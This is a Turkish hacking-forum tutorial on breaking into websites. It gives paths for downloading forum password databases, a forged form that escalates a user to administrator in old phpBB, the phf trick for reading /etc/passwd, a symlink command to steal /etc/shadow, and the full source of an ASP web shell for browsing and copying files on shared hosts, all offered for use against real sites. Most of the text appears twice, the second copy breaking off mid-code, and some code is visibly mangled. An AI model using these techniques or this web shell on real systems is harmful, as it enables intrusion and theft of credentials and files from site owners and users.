seytanin_amiri
Katılımcı Üye
İşte Geniş WeB HacK AnLaTımI (Döküman)
:diablo:diablo
Selamlar.Bu dökümanda size web hackle ilgili yararli olduguna inandigim bilgileri verecegim.Bu dökümanı uygalamaya
dökemeseniz bile bu islerin mantigini bir parca olsun anlayabilirsiniz.
Bir siteyi hacklemek için kullanabileceginiz birçok yöntem var.Bunlardan bazilari:
*Güvenlik Aciklari(asp,php,cgi,phf vb. gibi)
*Exploitler
*Fso(NtDaddy),listpathler
*Bruteforce
*Wordlist
*Birebir Baglanti(trojanlar vs)
*Fakemail
*Flood
Simdi bunlari teker teker inceleyelim:
_____GUVENLIK ACIKLARI:_____
Genelde baslicalari amatör olmak üzere bircok sitede güvenlik aciklari bulabilirsiniz.Özellikle hazir asp uyelik sistemi
kullanan siteleri,mesaj boardlarini ve forumlari bu aciklar yardimiyla hackleyebilirsiniz.
Ornek olarak Webwiz forumlarini ele alalim:
color=#0000ffwww.forumunadresi.com/admin/wwwforum.mdb olarak deneyin.Eger ana database e ulasirsaniz ki eger forum yeni kurulmussa
bu fazlasiyla mümkün,gerekli sifreleri alabilirsiniz(admin ifrelerini).(sifreleri acmak icin access kullanabilirsiniz)
Snitz forumlarda da ayni islem mümkün.Mdb ye
color=#0000ffwww.forumadresi.com/snitz_forums_2000.mdb adresinden ulasabilirsiniz.
son olarak asp nuke sistemlerde
color=#0000ffwww.siteadresi.com/db/main.mdb den database’e ulasabilirsiniz.
Söyledigim gibi sitede hazir üyelik portali kullaniliyor olabilir;
bunlari aspindir.com dan bakin.Eger aynisi kullanilan bir portal görürseniz portalin upload edilmeden önceki klasör yoluna
bakin.Böylece mdb nin nerede oldugunu bulabilirsiniz.Büyük ihtimalle bunlar
/db/main.mdb
/db/uyeler.mdb
/db/members.mdb
/db/sifreler.mdb gibi
Bir sitedeki sizin bulamadiginiz muhtemel aciklari tespit edebilmek icin güvenlik tarayicilarini kullanmanizi öneririm.
Bu tarayicilardan en yaygin olanlari
.N-Stealth
.Whisker
.Retina
.twwwscan
.m3hm3t’s CGI scanner’dır.
Php Sistemlerinin aciklari:
Size maillistlerdeki maillist acigini kullanabiliriz.Herhangi bir sitede bulunan maillist linkinin sonuna
/ml_config.dat ekLeyerek admin şifresine uLaşabiLirsiniz.
bi de örnek olsun die artik kalmayan php2.0.0 forumlarindan bir acik vermek istiyorum.Özellikle aciklarin mantigini
anlamaniza yardimci olacagina inaniyorum.
<form method="post" action="http://forum sayfası/admin/admin_ug_auth.php">
<p>User Level : <select name="userlevel">
<option value="admin" selected="selected">Administrator</option>
<option value="user">User</option>
</select></p>
<input type="hidden" name="private[1]" value="0" />
<input type="hidden" name="moderator[1]" value="0" />
<input type="hidden" name="mode" value="user" />
<input type="hidden" name="adv" value="" />
User ID: <input type="text" name="u" size="5"> <BR>
<input type="submit" name="submit" value="Submit" class="mainoption" />
<input type="reset" value="Reset" class="liteoption" name="reset" />
</form>
</bOdy>
</html>
Cgi scriptleri acigi:
WEBBS de bulunan bir acik.
https://tik.lat/LUsdF ya da https://tik.lat/2bUaD
Webadverts(reklam) acigi:Siteye konan reklamlarin hepsi icin ayri hesap acilir.
Siteye kendi bannerinizi koyup diger bannerlari kaldirabilirsiniz.
Açık : https://tik.lat/v1kQR
WWWBoard Scriptleri:
Açık : https://tik.lat/h0kQQ
Açık : https://tik.lat/Sggl2
Açık : https://tik.lat/rJV6j
Biraz da phfden bahsetmek istiyorum:
96’da FBI web sitesini hacklemekte kullanilan acik hala bagzi sitelerde bulunmaktadir.Size bu aciktan örnekler verecegim:
https://tik.lat/DVkb8 tc/passwd yaziyoruz browsera.ENTER dedigimizde
error 404 gelirse bu acik kapanmistir demektir.Eger kapanmamissa karsiniza gelebilecek 2 türlü secenek var.Ya direk
passwordlerle birlikte userlari görürsünüz ya da userlarin passwordleri * biçiminde shadowed password olarak görünür.
Örnek vermek gerekirse:
www-admin:SIFRE:100:11:WWW administrator:/home/Common/WWW:/bin/csh
yada
www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
gibi.En azindan denemekte yarar oldugunu düsünüyorum.Burada www-admin yerine herhangi bir kullanici adi da yazabilir.
_____EXPLOİTLER:_____
Çok kullanicili isletim sistemlerinde,sitelerde size bir boslugu kullanarak özel yetkiler vermek icin yazilan programlara
exploit adi veriyoruz.Exploit bize belirli bir sistemde yöneticilik ünvani verir.Bu ünvanlar NT’de administrator,Novell’da
supervisor,UNIX de clone yada root olarak siralanabilir.İki tür exploit bulunur bunlar remote(sistemin parcasi olmadan
kullabileceginiz exploitler) vede local(kullanmak icin sistemin bir parcasi olmaniz gerekenler) olarak siralanabilir.
Exploitler , sistemde ki buglar sayesin de r00t seviyesine çıkabilmek için yazılmış programlardır.
Cok yakinda bir cok exploiti TuzakONLINE.com’da bulabileceksiniz.
Bagzi örnek exploitler vermek istiyorum :
"overflow" exploiti (FreeBSD’de lprm açığı):Overflow exploitler color=#0000ffwww.securiteam.com adresinde bol bol bulunmaktadir.Pointer
artimetiğini kullanarak (Pointer değişkenler değişkenin içindeki bilgiyle birlikte bellek adresini de tutarlar) tampon
belleğe (buffer) bir string kopyalayarak taşma oluşturur. Sistemdeki lprm komutunu kullanır. lprm komutu uzaktaki bir
yazıcıya gönderilen bir işi iptal etmeye yarar. "lprm -P bloggs" komutuyla iş iptal edilebilirken kuyruktaki ikinci bir
iş aynı anda "lprm -P bloggs bloggs" la iptal edilebilir. Bu da buffer owerflow hatası meydana getirir. Bu sayede "root"
erişimi sağ..ır. Lokal bir exploittir.
Derleyici ve /tmp Hataları (Solaris’de gcc tempfile açığı): Gcc derleyicisinin 2.7.2.x ve önceki sürümlerinde
/tmp dizinine (geçici işlemlerin yürütüldüğü dizin. Windows dizini altındaki temp dizini gibi) sembolik link
(bir dosyaya ya da dizine ulaşabilmek için konan linkler. Windows’taki .lnk dosyaları gibi) oluşturulur ve bu
linkten yararlanarak lokal root hakkı alınır.
Program Hataları (Linux’daki X11Amp Programı açığı): X11Amp çalıştırıldığında ~./X11amp isminde bir dosya oluşturur.
Bu hatayı linux’ta şöyle kullanabilirsiniz:
mkdir ~/.x11amp
ln -s /etc/shadow ~/.x11amp/ekl
Bu komutları yazdıktan sonra X11Amp’i çalıştırıp "ekl" ’yi seçin bütün girişleri seçip silin. Program çakılacak ve
/etc/shadow dosyasını alabileceksiniz.
Microsoft’un FrontPage Server Extensions’unda karşılaşı.. açıklar: Frontpage extensions’un kullanıldığı web sitelerinde
pek çok açık bulmak mümkün, örneğin Frontpage 98’de dizin erişim hakları iyi düzenlenmediği için _vti_pvt dizini
"WORLD WRITABLE" olarak düzenlenmiş. _vti_pvt dizininde ise "service.pwd" dosyasında şifreler tutulmakta
Exploit uygulamali kullanimi icin size ayrica bir döküman hazirlayacagim.
_____FSO(NTDADDY),LISTPATH:______
Çoğumuz elmali şeker yada sadece şeker diye tanidik.Bir hostta kiralanan bir yere upload edilen bir asp kodudur.Bize Hosttaki tüm
domainlere erişim hakki saglar.Piyasada bir çok FSO kodu bulabilirsiniz.Belesh domain ve hostlarda bosuna denemeyin ise
yaramaz.Yeni listhpathler icin sık sık hack sitlerini ziyaret etmenizi öneririm.Çok yakinda üzerinde oynamalar yaptigim
süper bi şekeri tuzakonline.com da piyasaya sürücem.Simdilik bekleyin.Bu methodun bütün hostlarda calismasi konusunda
garanti veremem.Ama size su an icin kullanabileceginiz bir kac FSO kodunu cok yakinda sitede yayinlayacagim.Buna özel
ayri bir döküman da sitemizde mevcuttur(by alca.).
Örnek bir Fso kodu yaziyorum.Su an Calisip calismadigindan emin degilim ama ileri derecede asp biliyorsaniz isin
mantigini kaparsiniz
<%@ Language=VBScript %>
<%
Option Explicit
Dim giCount
Dim gvAttributes
Dim Ext
Dim ScriptFolder
Dim FolderPath
Dim FileSystem
Dim Drives
Dim Drive
Dim Folders
Dim Folder
Dim SubFolders
Dim SubFolder
Dim Files
Dim File
Dim BgColor, BackgroundColor,FSO
If Request.QueryString("CopyFolder") <> "" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
FSEDITTEDopyFolder Request.QueryString("CopyFolder") & "*", "d:"
End If
If Request.QueryString("CopyFile") <> "" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
FSEDITTEDopyFile Request.QueryString("FolderPath") & Request.QueryString("CopyFile"),
"d:"
End If
Set FileSystem = Server.CreateObject("Scripting.FileSystemObject")
FolderPath = Request.QueryString("FolderPath")
If FolderPath = "" Then
FolderPath = Request.ServerVariables("PATH_TRANSLATED")
End If
FolderPath = ParseFolder(FolderPath)
ScriptFolder = ParseFolder(Request.ServerVariables("PATH_TRANSLATED")) & "images"
%>
<html>
<head>
<title>Remote Explorer</title>
<style type="text/css">
BODY
{
BACKGROUND-COLOR: #C0C0C0
FONT-FAMILY: ’MS Sans Serif’, Arial;
FONT-SIZE: 8px;
MARGIN: 0px
}
TD,INPUT,SELECT
{
FONT-FAMILY: ’MS Sans Serif’, Arial;
FONT-SIZE: 8px;
}
.Address
{
BACKGROUND-ATTACHMENT: fixed;
BACKGROUND-POSITION: 1px center;
BACKGROUND-REPEAT: no-repeat;
Padding-LEFT: 10px
}
.Go
{
BACKGROUND-ATTACHMENT: fixed;
BACKGROUND-POSITION: left center;
BACKGROUND-REPEAT: no-repeat;
Padding-LEFT: 10px
}
</style>
</head>
<bOdy bgcolor="#c0c0c0">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<form>
<td width="1%" nowrap>
<select name="FolderPath" id="Drive">
<%
Set Drives = FileSystem.Drives
For Each Drive In Drives
Response.Write "<OPTION value=""" & Drive.DriveLetter & ":"""
If InStr(UCase(FolderPath), Drive.DriveLetter & ":") > 0 Then Response.Write "
selected"
Response.Write ">"
Response.Write Drive.DriveLetter & " - "
If Drive.DriveType = "Remote" Then
Response.Write Drive.ShareName & " [share]"
ElseIf Drive.DriveLetter <> "A" Then
If Drive.IsReady Then
Response.Write Drive.VolumeName
Else
Response.Write "(Not Ready)"
End If
Else
Response.Write "(Skiped Detection)"
End If
Response.Write "</OPTION>"
Next
%>
</select> <input class="Go" type="submit" value="Go" style="border:1px outset">
</td>
</form>
<td width="1%"> Address: </td>
<form>
<td width="100%">
<input class="Address" type="text" name="FolderPath" value="<%=FolderPath%>"
style="width:100%">
</td>
<td width="1%">
<input class="Go" type="submit" value="Go"style="border:1px outset">
</td>
</form>
</tr>
</table>
<%
Set Folder = FileSystem.GetFolder(FolderPath)
Set SubFolders = Folder.SubFolders
Set Files = Folder.Files
%>
<br>
<table cellpadding="1" cellspacing="1" border="0" width="100%" align="center"
style="border:1px inset">
<tr>
<td width="40%" height="20" bgcolor="silver"> Name</td>
<td width="10%" bgcolor="silver" align="right">Size </td>
<td width="20%" bgcolor="silver">Type </td>
<td width="20%" bgcolor="silver">Modified </td>
<td width="10%" bgcolor="silver" align="right">Attributes </td>
</tr>
<%
If Not Folder.IsRootFolder Then
BgToggle
%>
<tr title="Top Level">
<td bgcolor="<%=BgColor%>"><a href=
"<%=Request.ServerVariables("script_name")%>?FolderPat h=<%=Server.URLPathEncode(Folder.Drive
& "")%>"><font face="wingdings" size="4">O</font> Top Level</a> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
</tr>
<%BgToggle%>
<tr>
<td bgcolor="<%=BgColor%>"><a href=
"<%=Request.ServerVariables("script_name")%>?FolderPat h=<%=Server.URLPathEncode(Folder)%>"><font
face="wingdings" size="4">¶</font> Up One Level</a> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
</tr>
<%
End If
For Each SubFolder In SubFolders
BgToggle
%>
<tr>
<td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href=
"<%=Request.ServerVariables("script_name") & "?FolderPath=" &
Server.URLPathEncode(FolderPath & SubFolder.Name & "")%>"><font face="wingdings"
size="4">0</font> <%=SubFolder.Name%></a> (<a href=
"<%=Request.ServerVariables("script_name")%>?CopyFolde r=<%=Server.URLPathEncode(FolderPath
& SubFolder.Name)%>&FolderPath=<%=Server.URLPathEnco de(FolderPath & "")%>">Copy</a>
</td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"><%=SubFolder.Type%> </td>
<td bgcolor="<%=BgColor%>"><%=SubFolder.DateLastModi fied%> </td>
<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(SubFolder.Attributes)%> </td>
</tr>
<%
Next
For Each File In Files
BgToggle
Ext = FileExtension(File.Name)
%>
<tr>
<td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href=
"showcode.asp?f=<%=File.Name%>&FolderPath=<%=Se rver.URLPathEncode(FolderPath)%>"
target="_blank"><font face="wingdings" size="4">3</font> "<%=File.Name%></a> (<a
href=
"<%=Request.ServerVariables("script_name")%>?CopyFile= <%=File.Name%>&FolderPath=<%=Server.URLPathEnco de(FolderPath
& "")%>">Copy</a> </td>
<td bgcolor="<%=BgColor%>" align="right"><%=(File.Size)%> Byte </td>
<td bgcolor="<%=BgColor%>"><%=File.Type%></td& amp; gt;
<td bgcolor="<%=BgColor%>"><%=File.DateLastModified% ></td>
<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(File.Attributes)%></ td>
</tr>
<%Next%>
</table>
</bOdy>
</html>
<%
Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal
MinUpperBound, ByVal IndexSeperator)
Dim lsResult
Dim llTemp
Dim giCount
MaxValuePerIndex = MaxValuePerIndex + 1
Do While Int(SourceNumber / (MaxValuePerIndex ^ MinUpperBound)) > (MaxValuePerIndex
- 1)
MinUpperBound = MinUpperBound + 1
Loop
For giCount = MinUpperBound To 0 Step -1
llTemp = Int(SourceNumber / (MaxValuePerIndex ^ giCount))
lsResult = lsResult & CStr(llTemp)
If giCount > 0 Then lsResult = lsResult & IndexSeperator
SourceNumber = SourceNumber - (llTemp * (MaxValuePerIndex ^ giCount))
Next
ConvertBinary = lsResult
End Function
Private Sub BgToggle()
BackgroundColor = Not(BackgroundColor)
If BackgroundColor Then
BgColor = "#efefef"
Else
BgColor = "#ffffff"
End If
End Sub
Private Function Attributes(AttributeValue)
Dim lvAttributes
Dim lsResult
lvAttributes = Split(ConvertBinary(AttributeValue, 1, 7, ","), ",")
If lvAttributes(0) = 1 Then lsResult = "ReadOnly "
If lvAttributes(1) = 1 Then lsResult = lsResult & "Hidden "
If lvAttributes(2) = 1 Then lsResult = lsResult & "System "
If lvAttributes(5) = 1 Then lsResult = lsResult & "Archive "
Attributes = lsResult
End Function
Private Function FileExtension(FileName)
Dim lsExt
Dim liCount
For liCount = Len(FileName) To 1 Step -1
If Mid(FileName, liCount, 1) = "." Then
lsExt = Right(FileName, Len(FileName) - liCount)
Exit For
End If
Next
If Not FileSystem.FileExists(ScriptFolder & "ext_" & lsExt & ".gif") Then
lsExt = ""
End If
FileExtension = lsExt
End Function
Private Function ParseFolder(PathString)
Dim liCount
If Right(PathString, 1) = "" Then
ParseFolder = PathString
Else
For liCount = Len(PathString) To 1 Step -1
If Mid(PathString, liCount, 1) = "" Then
ParseFolder = Left(PathString, liCount)
Exit For
End If
Next
End If
End Function
%>
:diablo:diablo
Selamlar.Bu dökümanda size web hackle ilgili yararli olduguna inandigim bilgileri verecegim.Bu dökümanı uygalamaya
dökemeseniz bile bu islerin mantigini bir parca olsun anlayabilirsiniz.
Bir siteyi hacklemek için kullanabileceginiz birçok yöntem var.Bunlardan bazilari:
*Güvenlik Aciklari(asp,php,cgi,phf vb. gibi)
*Exploitler
*Fso(NtDaddy),listpathler
*Bruteforce
*Wordlist
*Birebir Baglanti(trojanlar vs)
*Fakemail
*Flood
Simdi bunlari teker teker inceleyelim:
_____GUVENLIK ACIKLARI:_____
Genelde baslicalari amatör olmak üzere bircok sitede güvenlik aciklari bulabilirsiniz.Özellikle hazir asp uyelik sistemi
kullanan siteleri,mesaj boardlarini ve forumlari bu aciklar yardimiyla hackleyebilirsiniz.
Ornek olarak Webwiz forumlarini ele alalim:
color=#0000ffwww.forumunadresi.com/admin/wwwforum.mdb olarak deneyin.Eger ana database e ulasirsaniz ki eger forum yeni kurulmussa
bu fazlasiyla mümkün,gerekli sifreleri alabilirsiniz(admin ifrelerini).(sifreleri acmak icin access kullanabilirsiniz)
Snitz forumlarda da ayni islem mümkün.Mdb ye
color=#0000ffwww.forumadresi.com/snitz_forums_2000.mdb adresinden ulasabilirsiniz.
son olarak asp nuke sistemlerde
color=#0000ffwww.siteadresi.com/db/main.mdb den database’e ulasabilirsiniz.
Söyledigim gibi sitede hazir üyelik portali kullaniliyor olabilir;
bunlari aspindir.com dan bakin.Eger aynisi kullanilan bir portal görürseniz portalin upload edilmeden önceki klasör yoluna
bakin.Böylece mdb nin nerede oldugunu bulabilirsiniz.Büyük ihtimalle bunlar
/db/main.mdb
/db/uyeler.mdb
/db/members.mdb
/db/sifreler.mdb gibi
Bir sitedeki sizin bulamadiginiz muhtemel aciklari tespit edebilmek icin güvenlik tarayicilarini kullanmanizi öneririm.
Bu tarayicilardan en yaygin olanlari
.N-Stealth
.Whisker
.Retina
.twwwscan
.m3hm3t’s CGI scanner’dır.
Php Sistemlerinin aciklari:
Size maillistlerdeki maillist acigini kullanabiliriz.Herhangi bir sitede bulunan maillist linkinin sonuna
/ml_config.dat ekLeyerek admin şifresine uLaşabiLirsiniz.
bi de örnek olsun die artik kalmayan php2.0.0 forumlarindan bir acik vermek istiyorum.Özellikle aciklarin mantigini
anlamaniza yardimci olacagina inaniyorum.
<form method="post" action="http://forum sayfası/admin/admin_ug_auth.php">
<p>User Level : <select name="userlevel">
<option value="admin" selected="selected">Administrator</option>
<option value="user">User</option>
</select></p>
<input type="hidden" name="private[1]" value="0" />
<input type="hidden" name="moderator[1]" value="0" />
<input type="hidden" name="mode" value="user" />
<input type="hidden" name="adv" value="" />
User ID: <input type="text" name="u" size="5"> <BR>
<input type="submit" name="submit" value="Submit" class="mainoption" />
<input type="reset" value="Reset" class="liteoption" name="reset" />
</form>
</bOdy>
</html>
Cgi scriptleri acigi:
WEBBS de bulunan bir acik.
https://tik.lat/LUsdF ya da https://tik.lat/2bUaD
Webadverts(reklam) acigi:Siteye konan reklamlarin hepsi icin ayri hesap acilir.
Siteye kendi bannerinizi koyup diger bannerlari kaldirabilirsiniz.
Açık : https://tik.lat/v1kQR
WWWBoard Scriptleri:
Açık : https://tik.lat/h0kQQ
Açık : https://tik.lat/Sggl2
Açık : https://tik.lat/rJV6j
Biraz da phfden bahsetmek istiyorum:
96’da FBI web sitesini hacklemekte kullanilan acik hala bagzi sitelerde bulunmaktadir.Size bu aciktan örnekler verecegim:
https://tik.lat/DVkb8 tc/passwd yaziyoruz browsera.ENTER dedigimizde
error 404 gelirse bu acik kapanmistir demektir.Eger kapanmamissa karsiniza gelebilecek 2 türlü secenek var.Ya direk
passwordlerle birlikte userlari görürsünüz ya da userlarin passwordleri * biçiminde shadowed password olarak görünür.
Örnek vermek gerekirse:
www-admin:SIFRE:100:11:WWW administrator:/home/Common/WWW:/bin/csh
yada
www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
gibi.En azindan denemekte yarar oldugunu düsünüyorum.Burada www-admin yerine herhangi bir kullanici adi da yazabilir.
_____EXPLOİTLER:_____
Çok kullanicili isletim sistemlerinde,sitelerde size bir boslugu kullanarak özel yetkiler vermek icin yazilan programlara
exploit adi veriyoruz.Exploit bize belirli bir sistemde yöneticilik ünvani verir.Bu ünvanlar NT’de administrator,Novell’da
supervisor,UNIX de clone yada root olarak siralanabilir.İki tür exploit bulunur bunlar remote(sistemin parcasi olmadan
kullabileceginiz exploitler) vede local(kullanmak icin sistemin bir parcasi olmaniz gerekenler) olarak siralanabilir.
Exploitler , sistemde ki buglar sayesin de r00t seviyesine çıkabilmek için yazılmış programlardır.
Cok yakinda bir cok exploiti TuzakONLINE.com’da bulabileceksiniz.
Bagzi örnek exploitler vermek istiyorum :
"overflow" exploiti (FreeBSD’de lprm açığı):Overflow exploitler color=#0000ffwww.securiteam.com adresinde bol bol bulunmaktadir.Pointer
artimetiğini kullanarak (Pointer değişkenler değişkenin içindeki bilgiyle birlikte bellek adresini de tutarlar) tampon
belleğe (buffer) bir string kopyalayarak taşma oluşturur. Sistemdeki lprm komutunu kullanır. lprm komutu uzaktaki bir
yazıcıya gönderilen bir işi iptal etmeye yarar. "lprm -P bloggs" komutuyla iş iptal edilebilirken kuyruktaki ikinci bir
iş aynı anda "lprm -P bloggs bloggs" la iptal edilebilir. Bu da buffer owerflow hatası meydana getirir. Bu sayede "root"
erişimi sağ..ır. Lokal bir exploittir.
Derleyici ve /tmp Hataları (Solaris’de gcc tempfile açığı): Gcc derleyicisinin 2.7.2.x ve önceki sürümlerinde
/tmp dizinine (geçici işlemlerin yürütüldüğü dizin. Windows dizini altındaki temp dizini gibi) sembolik link
(bir dosyaya ya da dizine ulaşabilmek için konan linkler. Windows’taki .lnk dosyaları gibi) oluşturulur ve bu
linkten yararlanarak lokal root hakkı alınır.
Program Hataları (Linux’daki X11Amp Programı açığı): X11Amp çalıştırıldığında ~./X11amp isminde bir dosya oluşturur.
Bu hatayı linux’ta şöyle kullanabilirsiniz:
mkdir ~/.x11amp
ln -s /etc/shadow ~/.x11amp/ekl
Bu komutları yazdıktan sonra X11Amp’i çalıştırıp "ekl" ’yi seçin bütün girişleri seçip silin. Program çakılacak ve
/etc/shadow dosyasını alabileceksiniz.
Microsoft’un FrontPage Server Extensions’unda karşılaşı.. açıklar: Frontpage extensions’un kullanıldığı web sitelerinde
pek çok açık bulmak mümkün, örneğin Frontpage 98’de dizin erişim hakları iyi düzenlenmediği için _vti_pvt dizini
"WORLD WRITABLE" olarak düzenlenmiş. _vti_pvt dizininde ise "service.pwd" dosyasında şifreler tutulmakta
Exploit uygulamali kullanimi icin size ayrica bir döküman hazirlayacagim.
_____FSO(NTDADDY),LISTPATH:______
Çoğumuz elmali şeker yada sadece şeker diye tanidik.Bir hostta kiralanan bir yere upload edilen bir asp kodudur.Bize Hosttaki tüm
domainlere erişim hakki saglar.Piyasada bir çok FSO kodu bulabilirsiniz.Belesh domain ve hostlarda bosuna denemeyin ise
yaramaz.Yeni listhpathler icin sık sık hack sitlerini ziyaret etmenizi öneririm.Çok yakinda üzerinde oynamalar yaptigim
süper bi şekeri tuzakonline.com da piyasaya sürücem.Simdilik bekleyin.Bu methodun bütün hostlarda calismasi konusunda
garanti veremem.Ama size su an icin kullanabileceginiz bir kac FSO kodunu cok yakinda sitede yayinlayacagim.Buna özel
ayri bir döküman da sitemizde mevcuttur(by alca.).
Örnek bir Fso kodu yaziyorum.Su an Calisip calismadigindan emin degilim ama ileri derecede asp biliyorsaniz isin
mantigini kaparsiniz
<%@ Language=VBScript %>
<%
Option Explicit
Dim giCount
Dim gvAttributes
Dim Ext
Dim ScriptFolder
Dim FolderPath
Dim FileSystem
Dim Drives
Dim Drive
Dim Folders
Dim Folder
Dim SubFolders
Dim SubFolder
Dim Files
Dim File
Dim BgColor, BackgroundColor,FSO
If Request.QueryString("CopyFolder") <> "" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
FSEDITTEDopyFolder Request.QueryString("CopyFolder") & "*", "d:"
End If
If Request.QueryString("CopyFile") <> "" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
FSEDITTEDopyFile Request.QueryString("FolderPath") & Request.QueryString("CopyFile"),
"d:"
End If
Set FileSystem = Server.CreateObject("Scripting.FileSystemObject")
FolderPath = Request.QueryString("FolderPath")
If FolderPath = "" Then
FolderPath = Request.ServerVariables("PATH_TRANSLATED")
End If
FolderPath = ParseFolder(FolderPath)
ScriptFolder = ParseFolder(Request.ServerVariables("PATH_TRANSLATED")) & "images"
%>
<html>
<head>
<title>Remote Explorer</title>
<style type="text/css">
BODY
{
BACKGROUND-COLOR: #C0C0C0
FONT-FAMILY: ’MS Sans Serif’, Arial;
FONT-SIZE: 8px;
MARGIN: 0px
}
TD,INPUT,SELECT
{
FONT-FAMILY: ’MS Sans Serif’, Arial;
FONT-SIZE: 8px;
}
.Address
{
BACKGROUND-ATTACHMENT: fixed;
BACKGROUND-POSITION: 1px center;
BACKGROUND-REPEAT: no-repeat;
Padding-LEFT: 10px
}
.Go
{
BACKGROUND-ATTACHMENT: fixed;
BACKGROUND-POSITION: left center;
BACKGROUND-REPEAT: no-repeat;
Padding-LEFT: 10px
}
</style>
</head>
<bOdy bgcolor="#c0c0c0">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<form>
<td width="1%" nowrap>
<select name="FolderPath" id="Drive">
<%
Set Drives = FileSystem.Drives
For Each Drive In Drives
Response.Write "<OPTION value=""" & Drive.DriveLetter & ":"""
If InStr(UCase(FolderPath), Drive.DriveLetter & ":") > 0 Then Response.Write "
selected"
Response.Write ">"
Response.Write Drive.DriveLetter & " - "
If Drive.DriveType = "Remote" Then
Response.Write Drive.ShareName & " [share]"
ElseIf Drive.DriveLetter <> "A" Then
If Drive.IsReady Then
Response.Write Drive.VolumeName
Else
Response.Write "(Not Ready)"
End If
Else
Response.Write "(Skiped Detection)"
End If
Response.Write "</OPTION>"
Next
%>
</select> <input class="Go" type="submit" value="Go" style="border:1px outset">
</td>
</form>
<td width="1%"> Address: </td>
<form>
<td width="100%">
<input class="Address" type="text" name="FolderPath" value="<%=FolderPath%>"
style="width:100%">
</td>
<td width="1%">
<input class="Go" type="submit" value="Go"style="border:1px outset">
</td>
</form>
</tr>
</table>
<%
Set Folder = FileSystem.GetFolder(FolderPath)
Set SubFolders = Folder.SubFolders
Set Files = Folder.Files
%>
<br>
<table cellpadding="1" cellspacing="1" border="0" width="100%" align="center"
style="border:1px inset">
<tr>
<td width="40%" height="20" bgcolor="silver"> Name</td>
<td width="10%" bgcolor="silver" align="right">Size </td>
<td width="20%" bgcolor="silver">Type </td>
<td width="20%" bgcolor="silver">Modified </td>
<td width="10%" bgcolor="silver" align="right">Attributes </td>
</tr>
<%
If Not Folder.IsRootFolder Then
BgToggle
%>
<tr title="Top Level">
<td bgcolor="<%=BgColor%>"><a href=
"<%=Request.ServerVariables("script_name")%>?FolderPat h=<%=Server.URLPathEncode(Folder.Drive
& "")%>"><font face="wingdings" size="4">O</font> Top Level</a> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
</tr>
<%BgToggle%>
<tr>
<td bgcolor="<%=BgColor%>"><a href=
"<%=Request.ServerVariables("script_name")%>?FolderPat h=<%=Server.URLPathEncode(Folder)%>"><font
face="wingdings" size="4">¶</font> Up One Level</a> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
</tr>
<%
End If
For Each SubFolder In SubFolders
BgToggle
%>
<tr>
<td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href=
"<%=Request.ServerVariables("script_name") & "?FolderPath=" &
Server.URLPathEncode(FolderPath & SubFolder.Name & "")%>"><font face="wingdings"
size="4">0</font> <%=SubFolder.Name%></a> (<a href=
"<%=Request.ServerVariables("script_name")%>?CopyFolde r=<%=Server.URLPathEncode(FolderPath
& SubFolder.Name)%>&FolderPath=<%=Server.URLPathEnco de(FolderPath & "")%>">Copy</a>
</td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"><%=SubFolder.Type%> </td>
<td bgcolor="<%=BgColor%>"><%=SubFolder.DateLastModi fied%> </td>
<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(SubFolder.Attributes)%> </td>
</tr>
<%
Next
For Each File In Files
BgToggle
Ext = FileExtension(File.Name)
%>
<tr>
<td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href=
"showcode.asp?f=<%=File.Name%>&FolderPath=<%=Se rver.URLPathEncode(FolderPath)%>"
target="_blank"><font face="wingdings" size="4">3</font> "<%=File.Name%></a> (<a
href=
"<%=Request.ServerVariables("script_name")%>?CopyFile= <%=File.Name%>&FolderPath=<%=Server.URLPathEnco de(FolderPath
& "")%>">Copy</a> </td>
<td bgcolor="<%=BgColor%>" align="right"><%=(File.Size)%> Byte </td>
<td bgcolor="<%=BgColor%>"><%=File.Type%></td& amp; gt;
<td bgcolor="<%=BgColor%>"><%=File.DateLastModified% ></td>
<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(File.Attributes)%></ td>
</tr>
<%Next%>
</table>
</bOdy>
</html>
<%
Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal
MinUpperBound, ByVal IndexSeperator)
Dim lsResult
Dim llTemp
Dim giCount
MaxValuePerIndex = MaxValuePerIndex + 1
Do While Int(SourceNumber / (MaxValuePerIndex ^ MinUpperBound)) > (MaxValuePerIndex
- 1)
MinUpperBound = MinUpperBound + 1
Loop
For giCount = MinUpperBound To 0 Step -1
llTemp = Int(SourceNumber / (MaxValuePerIndex ^ giCount))
lsResult = lsResult & CStr(llTemp)
If giCount > 0 Then lsResult = lsResult & IndexSeperator
SourceNumber = SourceNumber - (llTemp * (MaxValuePerIndex ^ giCount))
Next
ConvertBinary = lsResult
End Function
Private Sub BgToggle()
BackgroundColor = Not(BackgroundColor)
If BackgroundColor Then
BgColor = "#efefef"
Else
BgColor = "#ffffff"
End If
End Sub
Private Function Attributes(AttributeValue)
